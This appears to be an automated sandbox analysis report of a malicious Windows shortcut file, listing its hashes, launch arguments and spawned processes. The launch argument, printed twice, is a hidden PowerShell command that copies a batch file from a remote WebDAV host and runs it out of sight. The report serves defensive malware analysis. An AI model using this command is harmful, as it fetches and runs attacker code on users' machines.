SHA256: fa39116396d122c184476400edd9c0995ad5c7a8976d6cfba95fa3cb258767dc
SHA512: ff0e5f9f56bfb7fa2786b80e976d0891443f68e21ba7ec1ba31a9585074df9aa1d6be255c7943cd985b78ca8b09b15909018576d67282f7d61b7c67a82036e17
SSDEEP: 48:8GlZtezvs9bvYH1bjJ2JXjJ2KevG3d5JBE2Fe7:8EZtQ+bvYH1fJCzJne4dTBE8e7
TLSH: 7741CD1227FA4310F2F34B7469F967A59A72746BAB41DA9E0200406E0DB1F24ED24FB7
File Content Preview: L..................F.... ....h..T...P5..T....-..T................................P.O. .:i.....+00.../C:\...................V.1......X8...Windows.@........H.0.X8...../.......................Q.W.i.n.d.o.w.s.....Z.1......X."..System32..B........H.0.X."......
Icon Hash: 74f0e4e4e4e1e1ed

General

Relative Path:
Command Line Argument: -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Icon location: \\diatruiest.com@80\sniptool\work\a.ico
No network behavior found

Target ID: 3
Start time: 05:02:59
Start date: 24/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c "Copy-Item '\\invoicetrycloudflare.com@9983\DavWWWRoot\file.bat' \"$env:USERPROFILE\Downloads\"; Start-Process \"$env:USERPROFILE\Downloads\file.bat\" -WindowStyle Hidden"
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 05:02:59
Start date: 24/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

    Memory Dump Source
    • Source File: 00000003.00000002.1329195554.00007FF8884B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8884B0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_7ff8884b0000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9f7ed5c8e6347abee6e1cd2eab3ad510a55c107cac750f217366d67f96071ac7
    • Instruction ID: 70e9dc9444a0758478d1a2fba7992557b85c4e84294fe28d2ba5704cfb1cbd2d
    • Opcode Fuzzy Hash: 9f7ed5c8e6347abee6e1cd2eab3ad510a55c107cac750f217366d67f96071ac7
    • Instruction Fuzzy Hash: D001F133E0DAD98FE796DAE894802B8BBA2FF58751F4400BED04CDB093DA289814C345
    Memory Dump Source
    • Source File: 00000003.00000002.1328901815.00007FF8883E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8883E0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_7ff8883e0000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
    • Instruction ID: 139f69093de707e2bf1feccc8aa0283affab874a5fb227b685fe4c20e4a9c3a3
    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
    • Instruction Fuzzy Hash: E001677121CB0D4FDB44EF4CE451AA5B7E0FB99364F10056DE58AC3661DB36E882CB46
    Memory Dump Source
    • Source File: 00000003.00000002.1329195554.00007FF8884B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8884B0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_7ff8884b0000_powershell.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 470e7ca9d086adfd0e5716267fdc40517f53c36c224a2d237dc266eccaed4653
    • Instruction ID: 68b9a6e92f7f980da41fe331fc6076e02daf9a09619e535d8e88dd436e055043
    • Opcode Fuzzy Hash: 470e7ca9d086adfd0e5716267fdc40517f53c36c224a2d237dc266eccaed4653
    • Instruction Fuzzy Hash: B0F0BE33E0E6988FE756EAECA4442FCBBA1FB586A1F0400BFD04CDB193E92848458351